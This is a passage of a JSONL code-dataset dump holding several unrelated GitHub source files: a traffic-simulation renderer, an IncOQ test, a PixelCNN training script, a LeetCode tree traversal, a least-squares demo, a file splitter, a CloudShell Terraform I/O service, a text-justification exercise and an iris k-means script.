str(each)].set_color(colors[each][0]/255,colors[each][1]/255,colors[each][2]/255)\r\n self.car_name['car' + str(each)].set_color(0, 0, 1)\r\n\r\n self.car_name['car' + str(each)].add_attr(rendering.Transform(translation=(0,0)))\r\n self.cartrans_name['cartrans' + str(each)] = rendering.Transform()\r\n self.car_name['car' + str(each)].add_attr(self.cartrans_name['cartrans' + str(each)])\r\n self.viewer.add_geom(self.car_name['car' + str(each)])\r\n\r\n for each in range(self.car_num):\r\n if each not in self.car_state.keys():\r\n xpos = -1\r\n ypos = -1\r\n self.cartrans_name['cartrans' + str(each)].set_translation(\r\n (xpos - self.min_xposition) * self.screen_xscale * 1, (ypos - self.min_yposition) * self.screen_yscale * 1\r\n )\r\n self.cartrans_name['cartrans' + str(each)].set_rotation(\r\n 0 * math.pi\r\n )\r\n continue\r\n if each == self.s_id or each == self.t_id:\r\n self.car_name['car' + str(each)].set_color(0, 0, 0)\r\n self.cartrans_name['cartrans' + str(each)].set_rotation(\r\n ((self.car_state[each][1][1]/180) - 0.5) * math.pi\r\n )\r\n xpos = self.car_state[each][0][0] / self.real_xscale\r\n ypos = self.car_state[each][0][1] / self.real_yscale\r\n # print(\"坐标为\"+str(xpos)+','+str(ypos))\r\n # print(\"坐标为\"+str((xpos - self.min_xposition) * self.xscale * 1)+','+str((ypos - self.min_yposition) * self.yscale * 1))\r\n self.cartrans_name['cartrans' + str(each)].set_translation(\r\n (xpos - self.min_xposition) * self.screen_xscale * 1, (ypos - self.min_yposition) * self.screen_yscale * 1\r\n )\r\n\r\n for each in range(self.lan_num-1):\r\n if each == int((self.lan_num-1)/2):\r\n self.viewer.draw_line((0, self.border_height + (each + 1) * self.screen_lan_height),(self.screen_world_height, self.border_height + (each + 1) * self.screen_lan_height),color=(0, 1, 0))\r\n self.viewer.draw_line((self.border_width + (each + 1) * self.screen_lan_height, 0),(self.border_width + (each + 1) * self.screen_lan_height, self.screen_world_height),color=(0, 1, 0))\r\n else:\r\n self.viewer.draw_line((0, self.border_height + (each+1) * self.screen_lan_width), (self.screen_world_width, self.border_height + (each+1) * self.screen_lan_width), color=(0.745, 0.745, 0.745))\r\n self.viewer.draw_line((self.border_width + (each+1) * self.screen_lan_width, 0), (self.border_width + (each+1) * self.screen_lan_width, self.screen_world_height), color=(0.745, 0.745, 0.745))\r\n\r\n if len(connect1) > 1 and connect1[-1] == self.t_id:\r\n for each in range(len(connect1)-1):\r\n if connect1[each] != connect1[each+1]:\r\n xpos1 = (self.car_state[connect1[each]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos1 = (self.car_state[connect1[each]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n xpos2 = (self.car_state[connect1[each+1]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos2 = (self.car_state[connect1[each+1]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n self.viewer.draw_line((xpos1,ypos1), (xpos2,ypos2), color=c1)\r\n\r\n if len(connect2) > 1 and connect2[-1] == self.t_id:\r\n for each in range(len(connect2)-1):\r\n if connect2[each] != connect2[each+1]:\r\n xpos1 = (self.car_state[connect2[each]][0][0] - self.min_xposition) * self.screen_xscale / self.real_xscale * 1\r\n ypos1 = (self.car_state[connect2[each]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n xpos2 = (self.car_state[connect2[each+1]][0][0] - self.min_xposition) * self.screen_xscale / 
self.real_xscale * 1\r\n ypos2 = (self.car_state[connect2[each+1]][0][1] - self.min_yposition) * self.screen_yscale / self.real_yscale * 1\r\n self.viewer.draw_line((xpos1,ypos1), (xpos2,ypos2), color=c2)\r\n\r\n return self.viewer.render(return_rgb_array=mode == 'rgb_array')\r\n\r\n def close(self):\r\n if self.viewer:\r\n self.viewer.close()\r\n self.viewer = None","repo_name":"koterial/vanet","sub_path":"car.py","file_name":"car.py","file_ext":"py","file_size_in_byte":12216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"7079284859","text":"# Aggregate of a field retrieval in a comprehension.\n\nfrom incoq.runtime import *\n\nOPTIONS(\n obj_domain = True,\n default_impl = 'inc',\n)\nQUERYOPTIONS(\n '{sum(o.f) for o in s}',\n params = ['s'],\n impl = 'dem',\n)\n\ns = Set()\nfor x in [1, 2, 3]:\n o = Obj()\n o.f = Set()\n for y in [10, 20, 30]:\n o.f.add(x * y)\n s.add(o)\n\nprint(sorted({sum(o.f) for o in s}))\n","repo_name":"IncOQ/incoq","sub_path":"incoq/tests/programs/aggr/nested/obj_in.py","file_name":"obj_in.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"71303019026","text":"import os\nimport sys\nimport argparse\nimport configparser\nfrom datetime import datetime\nimport pytz\nfrom distutils.util import strtobool\nimport numpy as np\n\nfrom core.layers import PixelCNN\nfrom core.utils import Utils\n\nfrom keras.utils.visualize_util import plot\n\n\ndef train(argv=None):\n ''' train conditional Gated PixelCNN model \n Usage:\n \tpython train_keras_datasets.py -c sample_train.cfg : training example using configfile\n \tpython train_keras_datasets.py --option1 hoge ... : train with command-line options\n python train_keras_datasets.py -c test.cfg --opt1 hoge... : overwrite config options with command-line options\n '''\n\n ### parsing arguments from command-line or config-file ###\n if argv is None:\n argv = sys.argv\n\n conf_parser = argparse.ArgumentParser(\n description=__doc__, # printed with -h/--help\n formatter_class=argparse.RawDescriptionHelpFormatter,\n add_help=False\n )\n conf_parser.add_argument(\"-c\", \"--conf_file\",\n help=\"Specify config file\", metavar=\"FILE_PATH\")\n args, remaining_argv = conf_parser.parse_known_args()\n\n defaults = {}\n\n if args.conf_file:\n config = configparser.SafeConfigParser()\n config.read([args.conf_file])\n defaults.update(dict(config.items(\"General\")))\n\n parser = argparse.ArgumentParser(\n parents=[conf_parser]\n )\n parser.set_defaults(**defaults)\n parser.add_argument(\"--nb_epoch\", help=\"Number of epochs [Required]\", type=int, metavar=\"INT\")\n parser.add_argument(\"--batch_size\", help=\"Minibatch size\", type=int, metavar=\"INT\")\n parser.add_argument(\"--conditional\", help=\"model the conditional distribution p(x|h) (default:False)\", type=str, metavar=\"BOOL\")\n parser.add_argument(\"--dataset_name\", help=\"{'mnist', 'cifar10', 'cifar100'}\", type=str, metavar=\"DATASET_NAME\")\n parser.add_argument(\"--nb_pixelcnn_layers\", help=\"Number of PixelCNN Layers (exept last two ReLu layers)\", metavar=\"INT\")\n parser.add_argument(\"--nb_filters\", help=\"Number of filters for each layer\", metavar=\"INT\")\n parser.add_argument(\"--filter_size_1st\", help=\"Filter size for the first layer. (default: (7,7))\", metavar=\"INT,INT\")\n parser.add_argument(\"--filter_size\", help=\"Filter size for the subsequent layers. 
(default: (3,3))\", metavar=\"INT,INT\")\n parser.add_argument(\"--optimizer\", help=\"SGD optimizer (default: adadelta)\", type=str, metavar=\"OPT_NAME\")\n parser.add_argument(\"--es_patience\", help=\"Patience parameter for EarlyStopping\", type=int, metavar=\"INT\")\n parser.add_argument(\"--save_root\", help=\"Root directory which trained files are saved (default: /tmp/pixelcnn)\", type=str, metavar=\"DIR_PATH\")\n parser.add_argument(\"--timezone\", help=\"Trained files are saved in save_root/YYYYMMDDHHMMSS/ (default: Asia/Tokyo)\", type=str, metavar=\"REGION_NAME\")\n parser.add_argument(\"--save_best_only\", help=\"The latest best model will not be overwritten (default: False)\", type=str, metavar=\"BOOL\")\n parser.add_argument(\"--plot_model\", help=\"If True, plot a Keras model (using graphviz)\", type=str, metavar=\"BOOL\")\n\n args = parser.parse_args(remaining_argv)\n\n conditional = strtobool(args.conditional) if args.conditional else False\n try:\n dataset_name = args.dataset_name\n except:\n sys.exit(\"Error: --dataset_name must be specified.\")\n\n ### load keras dataset ###\n if dataset_name == 'mnist':\n from keras.datasets import mnist\n (X_train, h_train), (X_validation, h_validation) = mnist.load_data()\n input_size = (28, 28)\n nb_classes = 10\n nb_channels = 1\n elif dataset_name == 'cifar10':\n from keras.datasets import cifar10\n (X_train, h_train), (X_validation, h_validation) = cifar10.load_data()\n input_size = (32, 32)\n nb_classes = 10\n nb_channels = 3\n elif dataset_NAME == 'cifar100':\n from keras.datasets import cifar100\n (X_train, h_train), (X_validation, h_validation) = cifar100.load_data()\n input_size = (32, 32)\n nb_classes = 100\n nb_channels = 3\n\n utils = Utils()\n\n\n\n ### build PixelCNN model ###\n model_params = {}\n model_params['input_size'] = input_size\n model_params['nb_channels'] = nb_channels\n model_params['conditional'] = conditional\n if conditional:\n model_params['latent_dim'] = nb_classes\n if args.nb_pixelcnn_layers:\n model_params['nb_pixelcnn_layers'] = int(args.nb_pixelcnn_layers)\n if args.nb_filters:\n model_params['nb_filters'] = int(args.nb_filters)\n if args.filter_size_1st:\n model_params['filter_size_1st'] = tuple(map(int, args.filter_size_1st.split(',')))\n if args.filter_size:\n model_params['filter_size'] = tuple(map(int, args.filter_size.split(',')))\n if args.optimizer:\n model_params['optimizer'] = args.optimizer\n if args.es_patience:\n model_params['es_patience'] = int(args.patience)\n if args.save_best_only:\n model_params['save_best_only'] = strtobool(args.save_best_only)\n\n save_root = args.save_root if args.save_root else '/tmp/pixelcnn_'+dataset_name\n timezone = args.timezone if args.timezone else 'Asia/Tokyo'\n current_datetime = datetime.now(pytz.timezone(timezone)).strftime('%Y%m%d_%H%M%S')\n save_root = os.path.join(save_root, current_datetime)\n model_params['save_root'] = save_root\n\n if not os.path.exists(save_root):\n os.makedirs(save_root)\n\n try:\n nb_epoch = int(args.nb_epoch)\n batch_size = int(args.batch_size)\n except:\n sys.exit(\"Error: {--nb_epoch, --batch_size} must be specified.\")\n\n\n pixelcnn = PixelCNN(**model_params)\n pixelcnn.build_model()\n pixelcnn.model.summary()\n\n pixelcnn.print_train_parameters(save_root)\n pixelcnn.export_train_parameters(save_root)\n with open(os.path.join(save_root, 'parameters.txt'), 'a') as txt_file:\n txt_file.write('########## other options ##########\\n')\n txt_file.write('nb_epoch\\t: %s\\n' % nb_epoch)\n txt_file.write('batch_size\\t: 
%s\\n' % batch_size)\n        txt_file.write('\\n')\n    plot_model = strtobool(args.plot_model) if args.plot_model else True\n    if plot_model:\n        plot(pixelcnn.model, to_file=os.path.join(save_root, 'pixelcnn_model.png'))\n\n    if conditional:\n        train_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_train, h_train, batch_size)\n        validation_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_validation, h_validation, batch_size)\n    else:\n        train_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_train, None, batch_size)\n        validation_generator = utils.build_data_generator_from_keras_datasets(dataset_name, X_validation, None, batch_size)\n\n    nb_train_samples = len(X_train)\n    nb_validation_samples = len(X_validation)\n\n\n    pixelcnn.fit_generator(\n        train_generator=train_generator,\n        samples_per_epoch=nb_train_samples,\n        nb_epoch=nb_epoch,\n        validation_data=validation_generator,\n        nb_val_samples=nb_validation_samples)\n\n\n    return (0)\n\n\nif __name__ == '__main__':\n    sys.exit(train())\n","repo_name":"ldecamp/pixelcnn_keras","sub_path":"train_keras_datasets.py","file_name":"train_keras_datasets.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2478499849","text":"# Definition for a binary tree node.\n# class TreeNode:\n#     def __init__(self, val=0, left=None, right=None):\n#         self.val = val\n#         self.left = left\n#         self.right = right\nfrom typing import List, Optional\n\nclass Solution:\n    def levelOrder(self, root: Optional[TreeNode]) -> List[List[int]]:\n        result = []  # collected levels\n        queue = [root]  # BFS queue seeded with the root\n        while len(queue) > 0:  # one outer iteration per tree level\n            length = len(queue)  # number of nodes on the current level\n            level = []  # values collected on this level\n            for i in range(length):  # drain exactly the current level\n                node = queue.pop(0)\n                if node:\n                    level.append(node.val)\n                    if node.left:  # enqueue children for the next level\n                        queue.append(node.left)\n                    if node.right:\n                        queue.append(node.right)\n            if len(level) > 0:\n                result.append(level)\n        return result\n","repo_name":"thenunachi/dailyPracticeLeetCode","sub_path":"leetcode/trees/BinaryTreeLevelOrderTraversal.py","file_name":"BinaryTreeLevelOrderTraversal.py","file_ext":"py","file_size_in_byte":1023,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"39806914373","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import leastsq ##the least-squares solver\n\n'''\n Create the data: weight y, height x\n'''\nYi = np.array([61, 57, 58, 40, 90, 35, 45])\nXi = np.array([170, 168, 175, 153, 185, 135, 172])\n\n\n'''\n Define the fitting function and the residual function.\n How the shape of the fitting function is chosen:\n 1. plot the samples first\n 2. pick a functional form matching their rough shape (line, parabola, sine/cosine, ...)\n'''\n\n##func, the function to fit: fixes the shape of the curve\ndef func(p,x):\n    k,b=p\n    return k*x+b\n\n##residual function: x and y are arrays corresponding one-to-one to Xi and Yi above;\n# the goal is to keep adjusting k and b so that error keeps shrinking.\n# This error function plays the same role as the cost function in neural networks, only simpler.\ndef error(p,x,y):\n    return func(p,x)-y\n\n'''\n Main part, with some notes:\n 1. leastsq returns a tuple; the first element is the solution, the second a cost/status value\n 2. from the docs (on the second value): Value of the cost function at the solution\n 3. example: Para=>(array([ 0.61349535,  1.79409255]), 3)\n 4. the first element has as many entries as there are parameters to solve for\n'''\n\n#initial values of k and b; they can be set freely, though a few trials show p0 affects the cost value Para[1]\n#p0 holds the initial guesses for k and b.\n# As the iterations proceed, k and b keep changing so that the error function keeps decreasing.\np0=[4,20]\n\n#pack all arguments of error except p0 into args (required by leastsq)\nPara=leastsq(error,p0,args=(Xi,Yi))\n\n#read the results\nk,b=Para[0]\nprint(\"k=\",k,\"b=\",b)\nprint(\"cost:\"+str(Para[1]))\nprint(\"The fitted line is:\")\nprint(\"y=\"+str(round(k,2))+\"x+\"+str(round(b,2)))\n\n#p0=[0,0]\n#k= 0.9076449857973351 b= -95.00755623113787\n#cost:3\n#y=0.91x+-95.01\n\n#p0=[4,20]\n#k= 0.9076449912059097 b= -95.0075571180014\n#cost:1\n#y=0.91x+-95.01\n\n\n'''\n Plot to inspect the fit.\n matplotlib cannot render CJK labels without extra font setup,\n so the labels below are kept in English.\n'''\n\n#plot the sample points\nplt.figure(figsize=(8,6)) ##figure aspect 8:6\nplt.scatter(Xi,Yi,color=\"green\",label=\"sample data\",linewidth=2)\n\n#plot the fitted line\nx=np.linspace(0,200,100) ##100 evenly spaced points over 0-200\ny=k*x+b ##the line equation\nplt.plot(x,y,color=\"red\",label=\"fitted line\",linewidth=2)\nplt.legend(loc='lower right') #draw the legend\nplt.show()\n\n\n# R-style summary (scratch code kept commented out)\n# df = pd.DataFrame(y, x)\n# print(\"============================\")\n# # print(df.corr())\n# # print( df.info())\n# print(df.describe())\n# print(\"============================\")\n# print(\"Lower noise\", pearsonr(x, y))\n# print(\"Higher noise\", pearsonr(x, y))\n","repo_name":"liuyang19900520/ML_data","sub_path":"linearRegression&Logistic/ML2-1.py","file_name":"ML2-1.py","file_ext":"py","file_size_in_byte":2745,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"71818835027","text":"from colorama import Fore\nimport os\nimport math\n\nBUF = 50*1024*1024*1024\n\n\ndef split_file(file, file_size, number_of_part, del_src):\n    data = {}\n    if file_size != 199 and number_of_part != 0:\n        data[\"status\"] = 0\n        data[\"content\"] = \"Failure - Cannot split file with both file_size and number_of_part\"\n        return data\n\n    if not os.path.isfile(file):\n        current_dir = os.getcwd()\n        file = current_dir + '/' + file\n        if not os.path.isfile(file):\n            data[\"status\"] = 0\n            data[\"content\"] = \"Failure - File not exist\"\n            return data\n\n    if del_src != 0 and del_src != 1:\n        data[\"status\"] = 0\n        data[\"content\"] = \"Failure - Delete source file arg invalid\"\n        return data\n\n    chapters = 1\n    if number_of_part != 0:\n        if number_of_part <= 0:\n            data[\"status\"] = 0\n            data[\"content\"] = \"Failure - Number of part invalid\"\n            return data\n\n        file_size = os.path.getsize(file)\n        max_size = file_size / number_of_part\n    else:\n        max_size = file_size * 1024 - 1  # file_size is given in KB; compute before validating\n        if file_size <= 0 or max_size > os.path.getsize(file):\n            data[\"status\"] = 0\n            data[\"content\"] = \"Failure - File size invalid\"\n            return data\n\n    max_size = int(math.floor(max_size))\n    temp = b''  # lookahead byte; bytes, to match the binary reads below\n    with open(file, 'rb') as src:\n        while True:\n            tgt = open(file + '.%03d' % chapters, 'wb')\n            written = 0\n            while written < max_size:\n                if len(temp) > 0:\n                    tgt.write(temp)\n                tgt.write(src.read(min(BUF, max_size - written)))\n                written += min(BUF, max_size - written)\n                temp = src.read(1)\n                if len(temp) == 0:\n                    break\n            tgt.close()\n            if len(temp) == 0:\n                break\n            chapters += 1\n\n    if del_src == 1:\n        os.remove(file)\n\n    data[\"status\"] = 1\n    data[\"content\"] = \"split \" + str(chapters) + \" files\"\n    return data\n\n\ndef print_result(data):\n    status = data[\"status\"]\n    content = data[\"content\"]\n    if status == 1:\n        print(Fore.GREEN + content)\n    elif status == 0:\n        print(Fore.RED + content)\n","repo_name":"duc010298/Transfer-File-Python","sub_path":"split/functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
+{"seq_id":"2504829634","text":"import re\nfrom 
collections import namedtuple\nfrom typing import List, Dict\n\nfrom cloudshell.api.cloudshell_api import AttributeNameValue\n\nfrom cloudshell.iac.terraform.constants import ATTRIBUTE_NAMES\nfrom cloudshell.iac.terraform.models.shell_helper import ShellHelperObject\n\nTFVar = namedtuple('TFVar', ['name', 'value'])\n\n\nclass InputOutputService:\n def __init__(self, driver_helper: ShellHelperObject, inputs_map: Dict, outputs_map: Dict):\n self._driver_helper = driver_helper\n self._inputs_map = inputs_map\n self._outputs_map = outputs_map\n\n self._var_postfix_regex = re.compile(f\"{self._driver_helper.tf_service.cloudshell_model_name}\\.(.+)_tfvar\",\n re.IGNORECASE)\n\n def get_all_terrafrom_variables(self) -> List[TFVar]:\n # get variables from attributes that should be mapped to TF variables\n tf_vars = self.get_variables_from_tfvar_attributes()\n # get any additional TF variables from \"Terraform Inputs\" variable\n tf_vars.extend(self.get_variables_from_terraform_input_attribute())\n # get variables from explicitly mapped attributes\n tf_vars.extend(self.get_variables_from_explicitly_mapped_attributes())\n return tf_vars\n\n def get_variables_from_tfvar_attributes(self) -> List[TFVar]:\n \"\"\"\n Return list of TFVar based on attributes that end with \"_tfvar\" (case insensitive).\n Password attributes will be automatically decrypted\n \"\"\"\n result = []\n\n # find all attributes that end with \"_tfvar\"\n for attribute_name in self._driver_helper.tf_service.attributes:\n # add tf variable specific attributes to result\n m = re.match(self._var_postfix_regex, attribute_name)\n if m:\n # remove the prefix to get the TF variable name\n value = self._driver_helper.attr_handler.get_attribute(attribute_name)\n tf_var_value = self.try_decrypt_password(value)\n tf_var_name = m.group(1)\n\n result.append(TFVar(tf_var_name, tf_var_value))\n\n return result\n\n def get_variables_from_explicitly_mapped_attributes(self) -> List[TFVar]:\n \"\"\"\n Return list of TFVar objects based on \"inputs_map\" dictionary of attribute names to TF variable names.\n Attribute names anc TF variables names are case sensitive.\n Password attributes will be automatically decrypted.\n \"\"\"\n result = []\n self._driver_helper.logger.info(f\"inputs_map: {self._inputs_map}\")\n if not self._inputs_map:\n return result\n\n for attribute_name in self._inputs_map:\n if self._driver_helper.attr_handler.check_attribute_exist(attribute_name):\n attribute_value = self._driver_helper.attr_handler.get_attribute(attribute_name)\n attribute_value = self.try_decrypt_password(attribute_value)\n tf_var = self._inputs_map[attribute_name]\n result.append(TFVar(tf_var, attribute_value))\n else:\n raise ValueError(f\"Mapped attribute {attribute_name} doesn't exist on \"\n f\"service {self._driver_helper.tf_service.name}\")\n\n return result\n\n def get_variables_from_terraform_input_attribute(self) -> List[TFVar]:\n \"\"\"\n 'Terraform Inputs' is an optional attribute. The attribute is tests_helper_files CSV list of key=value.\n \"\"\"\n result = []\n tf_inputs_attr = self._driver_helper.attr_handler.get_attribute(ATTRIBUTE_NAMES.TF_INPUTS).strip()\n\n if tf_inputs_attr:\n for kvp in tf_inputs_attr.split(\",\"):\n name, value = kvp.strip().split(\"=\", 1)\n result.append(TFVar(name.strip(), value.strip()))\n\n return result\n\n def get_tags_from_custom_tags_attribute(self) -> Dict[str, str]:\n \"\"\"\n 'Custom Tags' is an optional attribute. 
The attribute is tests_helper_files CSV list of key=value.\n \"\"\"\n ct_inputs = self._driver_helper.attr_handler.get_attribute(ATTRIBUTE_NAMES.CT_INPUTS)\n result = {}\n\n if not ct_inputs:\n return result\n\n key_values = ct_inputs.split(\",\")\n\n for item in key_values:\n parts = item.split(\"=\")\n if len(parts) != 2:\n raise ValueError(\"Line must be comma-separated list of key=values: key1=val1,key2=val2...\")\n\n key = parts[0].strip()\n val = parts[1].strip()\n\n result[key] = val\n\n return result\n\n def try_decrypt_password(self, value: str) -> str:\n try:\n return self._driver_helper.api.DecryptPassword(value).Value\n except:\n return value\n\n def parse_and_save_outputs(self, unparsed_output_json: Dict) -> None:\n \"\"\"\n Parse the raw json from \"terraform output -json\" and update service attributes that are mapped to specific outputs.\n If \"Terraform Outputs\" attribute exist then save all unmapped outputs on this attribute\n \"\"\"\n # check if mapped output attributes exist in driver data model and if it does create an attribute update request\n attr_update_req = []\n unmaped_outputs = {}\n unmaped_sensitive_outputs = {}\n self._driver_helper.logger.info(f\"outputs_map: {self._outputs_map}\")\n\n for output in unparsed_output_json:\n regex = re.compile(f\"^{self._driver_helper.tf_service.cloudshell_model_name}\\.{output}_tfout$\",\n re.IGNORECASE)\n matched_attr_name = None\n for attr_name in self._driver_helper.tf_service.attributes:\n if re.match(regex, attr_name):\n matched_attr_name = attr_name\n break\n\n if matched_attr_name:\n attr_update_req.append(AttributeNameValue(matched_attr_name, unparsed_output_json[output]['value']))\n\n if self._is_explicitly_mapped_output(output):\n mapped_attr_name = self._driver_helper.attr_handler.\\\n get_2nd_gen_attribute_full_name(self._outputs_map[output])\n attr_update_req.append(\n AttributeNameValue(mapped_attr_name, unparsed_output_json[output]['value']))\n\n elif unparsed_output_json[output]['sensitive']:\n unmaped_sensitive_outputs[output] = unparsed_output_json[output]\n\n else:\n unmaped_outputs[output] = unparsed_output_json[output]\n\n # if TF OUTPUTS or TF SENSITIVE OUTPUTS attributes exists then we want to save all unmapped outputs\n # to this attributes\n tf_out_attr = f\"{self._driver_helper.tf_service.cloudshell_model_name}.{ATTRIBUTE_NAMES.TF_OUTPUTS}\"\n tf_sensitive_out_attr = f\"{self._driver_helper.tf_service.cloudshell_model_name}.\" \\\n f\"{ATTRIBUTE_NAMES.TF_SENSIITVE_OUTPUTS}\"\n\n if tf_out_attr in self._driver_helper.tf_service.attributes:\n # parse unmapped outputs\n output_string = self._parse_outputs_to_csv(unmaped_outputs)\n # prepare update request for unmapped attributes\n attr_update_req.append(AttributeNameValue(tf_out_attr, output_string))\n\n if tf_sensitive_out_attr in self._driver_helper.tf_service.attributes:\n # parse sensitive unmapped outputs\n sensitive_output_string = self._parse_outputs_to_csv(unmaped_sensitive_outputs)\n # prepare update request for sensitive unmapped attributes\n attr_update_req.append(AttributeNameValue(tf_sensitive_out_attr, sensitive_output_string))\n\n # send attribute update request using CS API\n if attr_update_req:\n self._driver_helper.api.SetServiceAttributesValues(self._driver_helper.sandbox_id,\n self._driver_helper.tf_service.name, attr_update_req)\n\n def _is_explicitly_mapped_output(self, output: str) -> bool:\n return self._outputs_map and output in self._outputs_map and \\\n 
self._driver_helper.attr_handler.check_2nd_gen_attribute_exist(self._outputs_map[output])\n\n def _parse_outputs_to_csv(self, outputs: Dict) -> str:\n output_string = []\n for output in outputs:\n output_string += [(output + '=' + str(outputs[output]['value']))]\n return \",\".join(output_string)\n","repo_name":"katzy687/CloudShell-Terraform-Shell","sub_path":"package/cloudshell/iac/terraform/services/input_output_service.py","file_name":"input_output_service.py","file_ext":"py","file_size_in_byte":8432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"48"} +{"seq_id":"14987024060","text":"import os\n\n#input and validation block\nwhile True:\n try:\n max_len_str = int(input('Please enter the maximum number of characters per line:'))\n except ValueError:\n print(\"Please, write down integer number\")\n continue\n\n if max_len_str >= 35 and max_len_str <=100:\n break\n \n elif max_len_str < 35:\n print('The number must be greater than 35')\n elif max_len_str > 100: \n print('The number must be less than 100')\n\n#open the file, read, #insert \\n every max_len_str index, but if in this index isn't ' ' find previous ' ' and store it\nwith open (\"text.txt\",'r', encoding='utf_8' ) as donor:\n with open (\"file1.txt\",'w', encoding='utf_8') as receiver:\n row = donor.read()\n row = list (row)\n i = max_len_str\n while i < len (row):\n while row[i] != ' ':\n i = i-1\n else:\n i=i\n row[i] = '\\n'\n i +=max_len_str+1\n \n receiver.writelines(row)\n \n#insert many spaces\nwith open (\"file1.txt\",'r', encoding='utf_8' ) as donor:\n with open (\"file2.txt\",'w', encoding='utf_8') as receiver: \n for x in donor:\n row=list(x)\n #count ' '. How many ' ' we have \n spaces = 0\n for i in row:\n if i == ' ':\n spaces +=1\n need = max_len_str - len(row)\n #indexes with ' '\n indexes = []\n ind = 0\n for i in row:\n if i == ' ':\n indexes.append(ind)\n ind +=1\n #count how many spaces we need insert\n if spaces>0:\n count_spaces = need//spaces\n else: \n count_spaces = need\n\n #insert spaces\n if need<= spaces:\n receiver.writelines(row)\n else: \n indexes_new = []\n\n y= 0\n\n for i in indexes:\n indexes_new.append(i+y)\n y+=count_spaces\n\n for i in indexes_new:\n y=0\n while y < count_spaces:\n row.insert (i, ' ')\n y+=1\n receiver.writelines(row)\n\n#insert additional spaces \nwith open (\"file2.txt\",'r', encoding='utf_8' ) as donor:\n with open (\"converted_text.txt\",'w', encoding='utf_8') as receiver: \n for x in donor:\n row=list(x)\n if len(x)==max_len_str+1:\n receiver.writelines(row)\n else: \n #count ' '. How many ' ' we have \n spaces = 0\n for i in row:\n if i == ' ':\n spaces +=1\n \n #how many ' ' we need\n need = max_len_str - len(row) +1\n\n #indexes with ' '\n indexes = []\n ind = 0\n for i in row:\n if i == ' ':\n indexes.append(ind)\n ind +=1 \n\n #calculate new indexes for insert\n indexes_new = [] \n y= 0\n for i in indexes:\n indexes_new.append(i+y)\n y+=1\n \n #leave only the necessary spaces\n indexes_new = indexes_new[0:(need)]\n for i in indexes_new:\n y=0\n row.insert (i, ' ')\n y+=1\n receiver.writelines(row)\n \n \n# remove additional files\nos.remove (\"file1.txt\")\nos.remove (\"file2.txt\")\n# tell users when they can find file \nprint (f\"We successfully have written new file. 
You can find it in {os.getcwd()}{os.sep}converted_text.txt\")","repo_name":"MikitaTsiarentsyeu/Md-PT1-50-22","sub_path":"Tasks/Bartosh/Task3/Task3.py","file_name":"Task3.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"}
+{"seq_id":"7658377447","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.font_manager as fm\nfrom sklearn.cluster import KMeans\nfrom sklearn import datasets\nfrom sklearn.metrics import fowlkes_mallows_score\n\n# load the custom plot font\nmyfont = fm.FontProperties(fname='ziti.TTF')\n# score candidate cluster counts\ndef get_best_cluster(x):\n\tscores = []\n\tfor i in range(2, 7):\n\t\t# build and train the model\n\t\tkmeans = KMeans(n_clusters = i, random_state=123).fit(x)\n\t\tscore = fowlkes_mallows_score(iris['target'], kmeans.labels_) # compare predicted clusters with the true labels\n\t\tscores.append(score)\n\t\tprint('FMI score for clustering iris into {0} groups: {1}, SSE: {2}'.format(str(i),str(score),str(kmeans.inertia_))) # SSE kept as a secondary score\n\n\t# scored against the true labels, 3 clusters gets the highest FMI, so 3 is the best unsupervised split\n\tmax_score_index = scores.index(max(scores))\n\tK = max_score_index + 2\n\tprint('Best split: [' + str(K) + '] clusters')\n\treturn K\n\n# 3D visualisation\ndef display_3d(X, model):\n\tlabels = model.labels_\n\tfig = plt.figure(\"iris clusters\", figsize=(4, 3))\n\tax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n\tnp.random.seed(5)\n\tax.scatter(X[:, 3], X[:, 0], X[:, 2], c=labels.astype(float), edgecolor='k')\n\tax.w_xaxis.set_ticklabels([0.1, 0.3, 0.5, 0.7, 0.9, 1.3, 1.5, 1.7])\n\tax.w_yaxis.set_ticklabels([3, 4, 5, 6, 7, 8, 9, 10, 11, 12])\n\tax.w_zaxis.set_ticklabels([1, 2, 3, 4, 5, 6, 7, 8])\n\tax.set_xlabel('petal width', fontproperties=myfont)\n\tax.set_ylabel('sepal length', fontproperties=myfont)\n\tax.set_zlabel('petal length', fontproperties=myfont)\n\tax.set_title(str(len(set(labels))) + \" clusters\", fontproperties=myfont)\n\tax.dist = 12\n\tplt.show()\n\n# load the data\niris = datasets.load_iris()\nX = iris.data\nK = get_best_cluster(X)\n\n# train the model\nmodel = KMeans(n_clusters=K)\nmodel.fit(X)\n\n# predict a new sample\nx_test = np.array([[4, 3, 1, 0.2]])\ny_pre = model.predict(x_test)\n\n# print the result\nprint(\"test sample:\", x_test, \" belongs to cluster:\", y_pre)\n\n# show the plot\ndisplay_3d(X,model)\n","repo_name":"franklinxkk/machinelearning","sub_path":"iris_cluster.py","file_name":"iris_cluster.py","file_ext":"py","file_size_in_byte":2011,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
